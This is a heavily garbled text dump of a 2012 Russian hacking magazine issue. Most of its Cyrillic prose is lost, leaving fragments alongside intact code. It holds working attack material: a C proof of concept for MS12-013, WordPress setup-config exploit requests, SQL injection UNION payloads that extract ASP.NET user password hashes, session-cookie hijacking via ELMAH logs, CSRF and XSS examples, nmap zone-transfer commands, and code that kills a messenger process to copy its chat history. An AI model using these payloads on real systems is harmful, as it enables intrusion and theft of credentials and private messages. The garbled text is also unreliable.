
established , avahi .
? WinSwitch .
mDNS .
- ,
~/.winswitch/client/applet.log.
,
mDNS. .
mDNS , ahavi,
. ,
, ,
. ! .
?
WinSwich
, . ,
, , ,

( ,
). ,
WinSwitch Direct Input,

. z
039
PC ZONE
Mifrill (mifrill@real.xakep.ru)
GOOGLE
.

10
DUCKDUCKGO.COM

? Google
? , ,
-
Bing?

,
,

,
.
DuckDuckGo.com.
040
?
. -
Google. DuckDuckGo
, , ,
(
)
privacy: DuckDuckGo , .
,
.
.
, Google
,

.
.

.
G+ , Google . DuckDuckGo
,
Google
. ,
! , :
.
.

200 000 ,
1 000 000
,
(duckduckgo.com/traffic.html),
. 2011
DuckDuckGo
Linux Mint 12. , ,
Linux
.
04 /159/ 2012
Google .
DuckDuckGo ,
Google.
.
-, 7 000
$ .
,
.
.
,
.
:
Google . .
,
,
? http://donttrack.us
,
.
, Google
. ,
? 1 2012
. , Google

, ,
,
, ,
, -
SMS . ?
. Google
,

. Gmail
,
.

Google Docs.
DuckDuckGo IP-, , .
: DuckDuckGo

. . duckduckgo.com/
privacy.html
, ,
,
.

,
,
, ,
, , .

goodies:
. DuckDuckGo: death date of lincoln (
),
Answer:
Saturday, April 15, 1865 (: , 15
, 1865).
, DuckDuckGo
,
?
goodies, goodies,
. ,

OpenStreetMap.

,
.
, area of china
( ) , :
3.705 million mi2 (square miles) (world rank:
4th), assuming china is a country (3.705 .
(4-
),
).
ID,
- (

Go!, ),

ISBN, ,
.
goodies .
heads or tails ( )
,
.
random number, roll die, random word
this or that or none.
roll
3d12 + 4.
DuckDuckGo
, . , ,
,
.
, SEO DuckDuckGo ,
.

.
DuckDuckGo
,
Yahoo! Search BOSS, Wikipedia, Wolfram Alpha
.
GOODIES

goodies
.
.
ip address
IP :).
IP ,

, , 64.207.122.151, DuckDuckGo
,
IP , :
64.207.122.151 is in: Cheyenne, Wyoming,
United States (82002).
goodies useragent, whois
, , ,
.
U+0153 : character
= 339: Latin small ligature oe; Unicode =
U+0153; Decimal = 339; HTML = œ.

password * strong passphrase
* words, * .
uuid, guid.
04 /159/ 2012
041
PC ZONE
, DuckDuckGo
Google
,
.
!bang.

.
, -
. ,
. !amazon
watch ( !a watch), amazon.com,
.
!youtube,
!twitter, !wikipedia, ,
. ,
: !g (google), !i (images), !yt
(youtube), !wiki .
bang ,
.
bang : duckduckgo.
com/bang.html ( ).
. random
number ( ), perimeter
triangle 1.5 2 3.2 (
1.5, 2, 3.2), md5 this (
md5- this)
goodies.
,
goodies -, ( ). ,

Wolfram Alpha
.

, .
, ,

, , . Wolfram
Alpha, DuckDuckGo,
.
.

,
, HTTPS ,

DDG.

, .
.
,
. DuckDuckGo
:

DuckDuckGo. .
!bang. .
042
goodies.
04 /159/ 2012
Google .
. .
:
j ;
k ;
/ h ;
esc ;
t ;
m ;
1 ! !bang.
:
Enter l o
;
Ctrl/Cmd+Enter ;
d ( ).
. DuckDuckGo
http://ddg.gg (,
, 4 , google.
com:),
SSL- https://
duckduckgo.com.
Tor.
3g2upl4pq6kufc4m.onion.
DDG .
!proxy -

. DuckDuckGo (, ,
).
.
DuckDuckGo,

,

.
Android iOS
( ).

MultiSeeker (bit.ly/dhbIVF).
. (ye.gg/
chatbot), XMPP
(Jabber).
,
im@ddg.gg. z
. ,
,
. donate

DuckDuckGo .
DuckDuckGo Perl JavaScript
YUI.

nginx,
FastCGI memcached, FreeBSD Ubuntu.
, Amazon
EC2.
PostgreSQL+bucardo, CDB, Solr, BerkelyDB, S3.
DuckDuckGo
GitHub
(github.com/duckduckgo).
?
.
:

, .
,
Duck Duck
Goose. ,
(Google it),
Duck it!
,
, ,
:).
10
DuckDuckGo
.

.
(MIT).
.
The Names Database
United Online 10 000 000
. DuckDuckGo
,

(, ,
).
Blekko (blekko.com)
2010 .
Blekko
, ,

.
. ,
/news

.
Blekko
15 000 000 .
04 /159/ 2012
YaCy (yacy.net)
YaCy P2P.

, Freeworld.

,
. ,
.
YaCy

.
Ixquick (ixquick.com)

Ixquick

. Ixquick,
DuckDuckGo, , . ,

Ixquick,
SSL-
( 2009 ).
Nigma (.)
. Nigma
,
.
,
Google, Yahoo, Bing, ,
Rambler, AltaVista, Aport.
,
.
043
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK

,
! - ESEC
(goo.gl/zDJFT).
. ,

,
. , Windows
Server 2008 Microsoft Group Policy Preferences (GPP).
Windows Vista Windows 7 , XP
. , . , , , ,
ESEC, .
.
, .
Group
Policy Management (gpmc.msc). , Local Users and Groups Computer
Configuration .

.
.
044
03 /158/ 2012
EASY HACK
ESEC , , . .

SYSVOL- XML- c .
. , . :
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="MyLocalUser"
image="0"
changed="2011-12-26 10:21:37"
uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}">
<Properties action="C" fullName="" description=""
cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0"
subAuthority=""
userName="MyLocalUser" />
</User>
</Groups>
. , ,
. -,
, AES 256,
, .

.
ESEC. (
), Microsoft
GP , GPP .
,
.
DNS ZONE TRANSFER
-
? ,

- , .

. DNS- ,
. ,
buhgal bank, , , . ,
admin.example.com.

DNS- (reverse),
DNS- IP-.
, ,
, IP-.
, DNS- , .
-, DNS Zone Transfer. , ,
DNS ,
. Zone
Transfer DNS-
, .
, , 53
DNS- TCP AXFR-.
,
nslookup,
Nmap.
nmap --script dns-zone-transfer.nse \
--script-args dns-zone-transfer.domain=<domain>
. , HD Moore. DNS- TLD (top-level-domain: .net,

.org, .xxx ) , -
03 /158/ 2012
Zone transfer .arpa
zone transfer. , 65 312 TLD

. , , .com
.ru, . 250 goo.gl/uVS1X.
:
1. nslookup.
2. DNS- : server 8.8.8.8.
3. : Set type=NS.
4. arpa
DNS-: arpa.
5. DNS- : server b.rootservers.net.
6. : ls d arpa.
, arpa , , . , , .
045
/ EASY HACK
APACHE
,
- . Apache. , .
CMS, ,
, .
- , . .
,
, .
? . , ,
, . ?
, , ,
, . ,
, - ,
, , ,
php-, inc-. inc Apache
-
,
. . ,
? . DirBuster.
, .
. - Apache
mod_negatiation.
.
-, . , -
(), ,
. ,
foo.htm.en foo.htm.de, /foo.htm ,

AcceptLanguage.
MultiViews. ,
foo Apache foo.*,
.
MultiViews
Options MutiViews
. , ? (Stefano Di Paola, goo.gl/ly8HK):
. ? . 2007
, Accept
mod_negatiation
,
. , foo , Accept,
:
GET /foo HTTP/1.1

Accept: */*
HTTP/1.1 200 OK
Server: Apache/2.0.55
Content-Location: foo.php
Vary: negotiate,accept
TCN: choice
046
04 /159/ 2012
EASY HACK
A , Accept,
:
GET /foo HTTP/1.1

Accept: xxx/blabla
HTTP/1.1 406 Not Acceptable

Server: Apache/2.0.55
Alternates: {"foo.bak" 1 {type application/x-trash} {length 3}},
{"foo.php" 1
{type application/x-httpd-php} {length 3}}
Vary: negotiate,accept
TCN: list
? , ,
. , ,
, ,

. ,
- , (AddType).
.php~ , , .
, , Apache .
. ,
Apache.
,
( )
.
Metasploit (auxiliary/
scanner/http/mod_negotiation_brute), , Acunetix . mod_negotiation
nmap:
nmap --script=http-apache-negotiation p80 sV

- CMS
. , - - ( ).
,
.
( https).
, , CSRF:
https://victim.com/admin.php?adduser=1&user=hacker&
password=hacker
,
.
, - . ,

CSRF. . , .
https://victim.com/admin.php?adduser=1&user=hacker&
password=hacker&token=long_random_bukva_cifra
, CSRF . ? , XSS. ,
(
). XSS .

, reflected XSS (
), stored XSS (
) . reflected
XSS. IE. /
.
, - ?
flash. . -,
04 /159/ 2012
( :). -,
.
flash
. evil.com
, victim.com .
evil.com, victim.com,
! , , .
? . same origin
policies. evil.com , victim.com , .
, ,
crossdomain.xml. , . victim.com.
, -
victim.com, victim.com/crossdomain.xml
,
.
. , ,
adobe goo.gl/A02R1.
:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control
permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.victim.com" secure="false"/>
<allow-access-from domain="www.microsoft.com"/>
</cross-domain-policy>
. ,
, allow-access-from, ,
. victim.com
047
/ EASY HACK
Microsoft. Master-only ,
crossdomain.xml, , ,
.
. , DNS NBNS-spoofing
victim.com , ,
. ,
victim.com.
secure (- true),
, c https. (false) victim.com Man-in-the-middle,
HTTP- . ,
https' .
.
-, - - ,
,
, , .
-, crossdomain.xml
, .
, - victim.com. -,
crossdomain.xml .
(
site-control master-only), -
. ,
victim.com,
xml.
,
<allow-access-from
domain=* >.
,
. ? . Alexa Top 50 000
- (goo.gl/rlCL1).

Silverlight Microsoft.
, . clientaccesspolicy.xml,
Silverlight , crossdomain.xml.
clientaccesspolicy.xml
(*)
http- https-. ,
xml.
COOKIES HTTPONLY
XSS
-. ,
. , XSS .
,
XSS .
document.cookie.
, -,
IE6. httpOnly.
, ,
javascript. , .
,
,
.
, httpOnly .
? cross-site tracing.
2003 , -
GET- POST- TRACE-. : -
, . :
XSS ,
TRACE,
.
(basic ntlm). , -
.

.
Apache. , 2.2 2.2.22. , TRACE,
-.
(Norman Hippert, goo.gl/ndGpv) ,
400 (HTTP 400 Bad Request)
048
Apache 2.2.
TRACE-. - , .
. ,
.
PoC :
javascript
.
04 /159/ 2012
!
shop.glc.ru

40%

8-800-200-3-999
+7 (495) 663-82-77 ()
6 1110 .
13 1999 .
6 1110 .
13 1999 .
6 564 .
13 1105 .
6 1110 .
13 1999 .
6 810 .
13 1499 .
6 1110 .
13 1999 .
6 630 .
13 1140 .
6 895 .
13 1699 .
6 1194 .
13 2149 .
6 894 .
13 1699 .
6 775 .
13 1399 .
6 950 .
13 1699 .
6 810 .
13 1499 .

AUDI A7
NEED FOR SPEED: THE RUN

"./#.1

350.589

;8IEB?8G
4@4EB

.EEDFOR3PEED4HE2UN
.E
4OYOTA#AMRY
6 690 .
13 1249 .
(ivinside.blogspot.com)
(115612, . , .1)
,
.
...
050
04 /159/ 2012
MS12-013:
C (msvcrt.dll)
CVSSV2
9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
Msvcrt.dll (DLL) C,
. msvcrt.dll ,
,
.
.
, , ,
,
, ,
.
, , , ,
.
EXPLOIT
MS _ _check_float_string().
, C
MS Visual Studio,
VC/CRT/src/input.c.
_ _check_float_string() .

(_TCHAR floatstring[_CVTBUFSIZE
+ 1];). , . :
, .

calloc(), recalloc(). ,
MS12-013,
.
- msvcrt.dll:
.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25|j
.text:6FFBEA1E push 2
.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block

.text:6FFBEA21 call __calloc_crt
.text:6FFBEA26
.text:6FFBEA27
.text:6FFBEA28
.text:6FFBEA2A
.text:6FFBEA2C
.text:6FFBEA2E
.text:6FFBEA31
.text:6FFBEA34
.text:6FFBEA37
.text:6FFBEA3D
.text:6FFBEA3F
pop ecx
pop ecx
mov [edi], eax
test eax, eax
jz short loc_6FFBEA1A
push [ebp+pulResult] ; size_t
mov eax, [ebp+arg_8]
push [ebp+arg_4] ; void *
mov dword ptr [eax], 1
push dword ptr [edi] ; void *
call _memcpy
.text:6FFBEA44 mov eax, [esi]

.text:6FFBEA46 push esi ; pulResult
.text:6FFBEA47 add eax, eax ; !!!!
.text:6FFBEA49 push 2 ; int
.text:6FFBEA4B push eax ; int
.text:6FFBEA4C mov [esi], eax
.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
.text:6FFBEA58 jge short loc_6FFBEA78
_ _calloc_crt()
SizeTMult(). _ _calloc_crt()
: __calloc_crt(Size, 2). ,
SizeTMult,
:
SizeTMult(Size*2, 2, &pResult)
,
Size*2,
Size*2*2. ,
- .
.
SizeTMult(). SizeTMult(Size, 2, &pResult).
MS add eax, eax:
.text:6FFBF935 push [ebp+pulResult] ; size_t
.text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h
POC MS12-013:
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")
#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")
#pragma comment(lib, "vs6/msvcrt.lib")
check_float_string CRT
04 /159/ 2012
051
/
#define BUF_SIZE 0x300
void main( void )
{
char *pStr;
float f;
int i;
Adobe Flash Player:

MP4
SequenceParameterSetNALUnit
CVSSV2
10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
pStr = (char*)malloc(BUF_SIZE);
memset(pStr, 0, BUF_SIZE);
strcpy(pStr, "1.");
for( i=1; i<=BUF_SIZE-10; i++)
{
strcat(pStr, "0");
}
printf("Before scanf()\n");
sscanf(pStr,"%f", &f);
10 2012 metasploit- ,
mp4-, Flash10u.ocx Adobe Flash Player.
sequenceParameterSetNALUnit.
num_ref_frames_in_pic_order_cnt_cycle, , Flash

offset_for_ref_frame , . ,
Flash-.
, ITW.
printf("After scanf()\n");
EXPLOIT
printf("%f\n", f);
( sub_1005B396), Flash10u.ocx
10.3.181.34:
}
TARGETS
Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008

SOLUTION
,
.
.text:1005B482
call
SubReadUExpGlomb
; pic_order_cnt_type
.text:1005B487
mov
[esi+40h], eax
.text:1005B48A
cmp
eax, ebp
; pic_order_cnt_type != 0 (ebp=0)
.text:1005B48C
jnz
short loc_1005B49D
; ...
ms12-013:
052
04 /159/ 2012
.text:1005B49D
xor
ebx, ebx
.text:1005B49F
inc
ebx
.text:1005B4A0
cmp
eax, ebx
.text:1005B4A2
jnz
short loc_1005B4EF
; pic_order_cnt_type != 1
.text:1005B4A4
mov
ecx, edi
.text:1005B4A6
call
SubReadBit
; delta_pic_order_always_zero_flag
.text:1005B4AB
mov
ecx, edi
.text:1005B4AD
mov
[esi+48h], al
.text:1005B4B0
call
SubReadSExpGlomb
; offset_for_non_ref_pic
.text:1005B4B5
mov
ecx, edi
.text:1005B4B7
mov
[esi+54h], eax
.text:1005B4BA
call
SubReadSExpGlomb
; offset_for_non_ref_pic
.text:1005B4BF
mov
ecx, edi
.text:1005B4C1
mov
[esi+50h], eax
.text:1005B4C4
call
SubReadUExpGlomb
; num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9
mov
[esi+4Ch], eax
.text:1005B4CC
test
eax, eax
.text:1005B4CE
jbe
short loc_1005B4EF
; num_ref_frames_in_pic_order_cnt_cycle == 0
.text:1005B4D0
lea
eax, [esi+58h]
.text:1005B4D3
mov
[esp+10h+ptr], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7:
; CODE XREF: SubParseSeqParameterSet+157|j
.text:1005B4D7
mov
ecx, edi
.text:1005B4D9
call
SubReadSExpGlomb
; offset_for_ref_frame
.text:1005B4DE
mov
ecx, [esp+10h+ptr]
.text:1005B4E2
add
[esp+10h+ptr], 4
.text:1005B4E7
inc
ebp ; ebp -
.text:1005B4E8
mov
[ecx], eax
; ecx
.text:1005B4EA
cmp
ebp, [esi+4Ch] ;
; c num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4ED
jb
short loc_1005B4D7
SubReadUExpGlomb() .
SubReadSExpGlomb() . SubReadBit()
. ,
num_ref_frames_in_pic_order_cnt_
cycle. Flash Player
stack cookies,
eip - .
TARGETS
Adobe Flash Player <= 10.3.181.36

SOLUTION
10.3.183.5
WordPress
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
, setup-config.php,
Claudius)
WordPress. - PHP-,
XSS-, MySQL.
EXPLOIT
1. PHP- XSS
setup-config.php.
WordPress MySQL.
MySQL.
MySQL
,
/ MySQL . WordPress PHP- WordPress. ,
WordPress
Javascript- ,
XSS.
. , A.B.C.D -
WordPress, W.X.Y.Z - MySQL.
POST- GET- WordPress :
BRIEF
Trustwave SpiderLabs
(Jonathan
04 /159/ 2012
POST-
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
053
/
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;
rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z
&prefix=wp_&submit=Submit
GET-
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
WordPress 404.php
( , ),
PHP-:
<?php
phpinfo();
?>
GET- :
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
XSS
,
:
UPDATE wp_comments SET
comment_content='<script>alert('123')</script>' where
comment_content='Hi, this is a comment.<br />To delete
a comment, just log in and view the post's
comments. There you will have the option to edit
or delete them.';
, GET, Javascript-:
GET /?p=1 HTTP/1.1
Host: A.B.C.D
054
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
2. XSS setup-config.php. Javascript-

dbname, dbhost uname.
POST-:
Host: A.B.C.D
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Content-Length: 112
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&
uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit
3. MySQL
setup-config.php.
MySQL,
. , ,
MySQL, ,
. :
Host: A.B.C.D
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Content-Length: 32
uname=user&pwd=pass&dbhost=L.M.N.O
L.M.N.O user pass.

TARGETS
WordPress 3.3.1 .
SOLUTION
- ,
WordPress
.

, . ,
WordPress ,
.

MySQL, WAF, , ModSecurity,
. z
04 /159/ 2012
(blog.chivavas.org)
ASP.NET:

DVD

Music
Store

ELMAH
,
,

,
, ,
. ELMAH
ASP.NET-.
Web- ELMAH
056

,
, , . , , ,
. -,
. (deadlock) :
,
. -, . ,

web-. : 99%,
, .
: -?
:
:
, ,
.
, ,
.
,
.
04 /159/ 2012
ASP.NET:

ELMAH ,
,
,

. 2007

web-,
ASP.NET. Web-
Trace.axd, ELAMH,

.

.
Rapid7.
, SQL-
(, ,
) , .
,
? , , , ,
, 80%
.
ELMAH?
ELMAH ( Error Logging Modules and
Handlers) , (Atif Aziz).
, ASP.NET.
(ELMAH 1.1 NuGet 11
2011 ),
.NET. , NuGet,
45 583 .
ELMAH . web-
:
NuGet ! , ELMAH ,
!
Web.config. .
, ELMAH :
,
RSS .
04 /159/ 2012
.
web- ASP.NET MVC
Music Store, .
CodePlex, ELMAH,

. web- Visual Studio IIS.
,
http://localhost/MusicStore.

,
ELMAH. Music Store
, Admin .
admin p@ssw0rd .
- .
ASP.NET MVC,
, 404, , . ? . ,
. web ELMAH, http://localhost/
MusicStore/elmah.axd. ,
, ELMAH, 404,
. ,
ELMAH. Details
. -, ELMAH
: ,
. ? .

, (
), ,
, . , ! ,
, , ,
-
. , ELMAH customErrors ASP.NET,
web-.

, customError on (),
057

ELMAH,
.
. ELMAH . , , , ,
, HTTP_COOKIE, HTTP_HOST,
HTTP_USER_AGENT .
HTTP_COOKIE AUTH_USER.
AUTH_USER ,
.
admin. HTTP_COOKIE . ,
.ASPXAUTH.
.
, ,

. ,
ASP.NET_SessionId.
. ,
- .

. :
.ASPXAUTH ASP.NET_SessionId .

. . ELMAH
. ,
.
. ,
. -, ELMAH
RSS.
http://localhost/MusicStore/elmah.axd/rss RSS
, :).
? . , -
( ELMAH).
: .
Music Store, 404.
, : http://localhost/MusicStore/Store/
Browse>aspx". , 400 ,
ELMAH. , . , , .
. web- ELMAH
.
- :
ELMAH Web.config
058
Music Store SQL-
ASP.NET_SessionId=3dljmclkhjpat52quopccijj;
.ASPXAUTH=CDB45013DD38AD7D2759BA6FAA7D98F07
...
B84C6CB5BCC76E7AE899690CC2016B5F1BCE9CDCBAA
.
Firefox Firebug Firecookie.
ASP.NET_SessionId ,
. .ASPXAUTH.
! , Admin
. ,
, ,
.

ELMAH
, .
SQL Injection Music Store.
Music
Store Microsoft . , . http://
localhost/MusicStore/Search. ,
. ,
SQL-, ,
. ELMAH, ,
. - "' or select 1 from abcdef".
, abcdef
( ). , .
, SQL-. ELMAH
:
System.Data.SqlClient.SqlException (0x80131904):
Incorrect syntax near the keyword 'select'.
Incorrect syntax near '%'.
Unclosed quotation mark after the character string ''.
? -,
SQL Server. -, .
.
, ELMAH ,
SQL-, .
Sql.
CSV,
http://localhost/MusicStore/elmah.axd/download,
Microsoft Excel .
. : "' or 1
= 1 --". ? . -
04 /159/ 2012
ASP.NET:
WWW
ELMAH
( ,
..):
code.google.com/p/
elmah.

NuGet: nuget.org.
web ASP.
NET MVC Music Store:
mvcmusicstore.
codeplex.com/.;
Firebug:
getfirebug.com.
Firecookie:
bit.ly/gMhx7B.
Visual Web Developer 2010 Express:
bit.ly/ldalNH.;
SQL Server 2008
Express:
bit.ly/AtJpCt.

ASP.NET (Trace.axd):
bit.ly/xaZzSn.
Web- ELMAH
,
.
Music Store, ASP.NET MVC SQL
Server, web- (
, .ASPXAUTH). ,
, ASP.NET,
2.0. , aspnet_Users aspnet_Membership.
, : "Hits'
and exists(select 1 from sys.tables where name = 'aspnet_
Users') --". .
.
( , ),
: .
:
select 1, u.UserName + ':' + m.Password + ':' +
m.PasswordSalt from dbo.aspnet_Users as u
inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId
,
:
"' and 1 <> 1 union all select 1, u.UserName + ':' +
m.Password + ':' + m.PasswordSalt from dbo.aspnet_Users
as u inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId --"
?
, ,
, , . ,

ELMAH, web-. ,
.
ELMAH
, ,
.
04 /159/ 2012
ASP.NET,
Web.config . web-,
:
1. ELMAH configuration/
system.web/httpHandlers configuration/system.webServer/
handlers Web.config;
2. configuration XML:
<location path="elmah.axd">
<system.web>
<httpHandlers>
<add verb="POST,GET,HEAD" path="elmah.axd"
type="Elmah.ErrorLogPageFactory, Elmah" />
</httpHandlers>
<authorization>
<allow roles="Administrator" />
<deny users="*" />
</authorization>
</system.web>
<system.webServer>
<handlers>
<add name="Elmah" path="elmah.axd"
verb="POST,GET,HEAD"
type="Elmah.ErrorLogPageFactory, Elmah"
preCondition="integratedMode" />
</handlers>
</system.webServer>
</location>
! c Administrator
ELMAH, , .
, ,

,
.
, , . z
059
Gar|k (garik@coru.ws)
u
.R
il
Ma

Mail.
Ru ,
,

.

21,4
.
,
.

,

.
060
WARNING

138
,
,
,

,

28
(.
272, 273, 274).
DVD

mra.dbs,
,

WinHex-,

2008 ,
Mail.ru .
*email*history.txt mra.dbs
(,
) .
, RTF-, .
. , ,
Mail.ru History Reader,
][ 2009 .
,
(. ) . Mail.ru ,
mra.dbs.
. SOLON7
HEX-, ,

Mail.ru . 2010
- .
04 /159/ 2012
Mail.Ru
MRA.DBS?
, , : , ,
mra.dbs, ? mra.dbs
%APPDATA%\Mra\Base\mra.dbs ( C:\Documents and Settings\user\Application Data\Mra\
Base\mra.dbs),
,
ExpandEnvironmentStrings CopyFile.
mra.dbs
. ,
, (
,
)
, . (, ,
)
(
). , .
ZwQuerySystemInformation
DuplicateHandle
. ,
ZwQueryInformationFile ,
. ( ) FileObject,
-.
,

, . ,
,
,
. , , .
,
FILE_READ_ATTRIBUTES ( ),
, (
) (
NTFS MFT).
, (
).
.
, Mail.ru , (ProcessID).
: ToolHelp API, Native API
( ZwQuerySystemInformation),

(GetWindowThreadProcessId).
ToolHelp API exe-.
CreateToolhelp32Snapshot >
Process32First > Process32Next,
szExeFile PROCESSENTRY32 c magent.
exe. ProcessID ,
th32ProcessID:
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if( INVALID_HANDLE_VALUE != hProcessSnap)
{
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( Process32First( hProcessSnap, &pe32 ) )
{
do
{
if(0 == lstrcmp(pe32.szExeFile,_TEXT("magent.exe")))
{
04 /159/ 2012
pid=pe32.th32ProcessID;
break;
}
}
while(Process32Next( hProcessSnap, &pe32 ));
}
CloseHandle( hProcessSnap );
}
PID,
SeDebugPrivilege (OpenProcessToken >
LookupPrivilegeValue > AdjustTokenPrivileges)
(OpenProcess > TerminateProcess), CopyFile.
Native API:
void GetPrivilege(IN ULONG Privilege)
{
BOOLEAN OldValue;
RtlAdjustPrivilege(Privilege, TRUE, FALSE, &OldValue);
}
, mra.dbs . :).
MRA.DBS
mra.dbs Mail.ru ,

( ,
:), ,
.
-.
, mra.dbs -,
4- .
,
( ):
typedef struct _ids {
unsigned int id1;
unsigned int id2;
unsigned int count;
} _ids;

mrahistory_, e-mail mra.dbs
e-mail , . :
,
. ,
( _ids).
061
( ) (
):
struct _message
{
unsigned int size;
unsigned int prev_id;
unsigned int next_id;
unsigned int xz1;
FILETIME time;
unsigned int type_mesage;
char flag_incoming;
char byte[3];
unsigned int count_nick;
unsigned int magic_num; // 0x38
unsigned int count_message;
unsigned int xz2;
unsigned int size_lps_rtf;
unsigned int xz3;
};
,
, .
, 0x2C , , ,
.
:

( );
0x190
mrahistory_, , 0x24
.
, :
Unicode (wchar_t) :
;
LPS ( MMP),
;
RTF.
, . ,
-, ?
SOLON7
.

0x10 mra.dbs, , -.
-, . , ,
mra.dbs. . 0x20
DWORD * offset_table=(DWORD *)(mra_base +

*(DWORD*)(mra_base + 0x10));
DWORD end_id_mail=*(DWORD*)(mra_base+0x20+
offset_table[1]);
DWORD count_emails=*(DWORD*)(mra_base+0x2C+
offset_table[1]);
...
for(int i=0;i<count_emails;i++)
{
_ids *mail_data=(struct _ids*)(mra_base+
offset_table[end_id_mail]+4);
if(memmem(((unsigned char*)mail_data+0x190),
mrahistory,...))
{
emails[k].id=(_ids*)((unsigned char*)mail_data+0x24);
...
}
end_id_mail=mail_data->id2;
}
, mra.dbs
. .
, mra.dbs ,

, .
Windows Memory Mapped
:
MRA.DBS
2 4 7 10 35 46
062
04 /159/ 2012
Mail.Ru
WWW
INFO

Mail.ru
5.4:
bit.ly/z2ETMY;
Mail.ru
History Reader:
bit.ly/xZoKvU;
:
c0dedgarik.blogspot.
com;
++
winhex.
pos-:
bit.ly/zsTJTb;

:
bit.ly/zNgQ2S;

:
bit.ly/w4upzS;

Visual
Studio:
bit.ly/w7sWNA.
-
,
,

.

,

,

.
CreateFile
CreateFileMap
MapViewOfFile
VirtualFree
CloseHandle
CloseHandle

, UnmapViewOfFile VirtualFree.
, , . emails:
typedef struct _emails{
wchar_t *email;
_ids *id;
};
...
struct _emails *emails;
...
emails=VirtualAlloc(0,count_emails*sizeof(struct _emails),..);
RICH TEXT FORMAT (RTF)

RTF, mra.dbs,
, 1982
Microsoft Adobe.
,
EM_STREAMIN SF_RTF
EM_STREAMOUT SF_TEXT :
EDITSTREAM es = { 0 };
es.pfnCallback = EditStreamCallback;
es.dwCookie = (DWORD_PTR)&lps;
SendMessage(hRich, EM_STREAMIN, SF_RTF, (LPARAM)&es);
04 /159/ 2012

mrahistory_ . ,
16*count_emails (, 1
000 ~15 ). ,

, :
int id_message=emails[k].id->id1;
for(int i=0;i<emails[k].id->count_messages;i++)
{
_message*mes=(_message*)(mra_base+
offset_table[id_message]);
wchar_t*str=(wchar_t*)((unsigned char*)mes+
sizeof(_message));
...
id_message=mes->prev_id;
}
FILETIME,

FileTimeToSystemTime. RTF
Rich Edit
WordPad. , ,
message. , ,
.
P.S.
,
,
. , (exe , , 2
) C-,
hex- .
,
ICQ-, mra.dbs.
Mail.Ru, -, Mail.Ru ,
-, , -,
, . z
063
Daeren Torn
064
WARNING

. ,

,

.

, .

.

. , .
04 /159/ 2012

,

. !
*****09 : -85 |
*****61 : -71 |
*****60 : 0 |
. 31 ,
. ,
,
( - ? . )?
Webmoney ,
, . ,
, html, .
, - :).
, . Epic fail.
, , ,
html- .
, input-:
m_from m_to. , ! :
ID? , : m_from,
, .
ID .
, .
! , , ,
, , . ,
-85 , 290!
( ), , . , ,
ID . , ! ,
. ,
, ,
.
.

?

Opera
disabled ( , ).
:
, .
, .

/ , ,
.
, . , ID.
:
*****09 :
*****61 :
*****60 :
<input type=button value='' name=show_orders_list

onClick='showPay(this.form, ***39)'>
15 |
-71 |
-100|
04 /159/ 2012
065

ID ,
: ID!
. ,
. ,
,
: , (.) .
, !
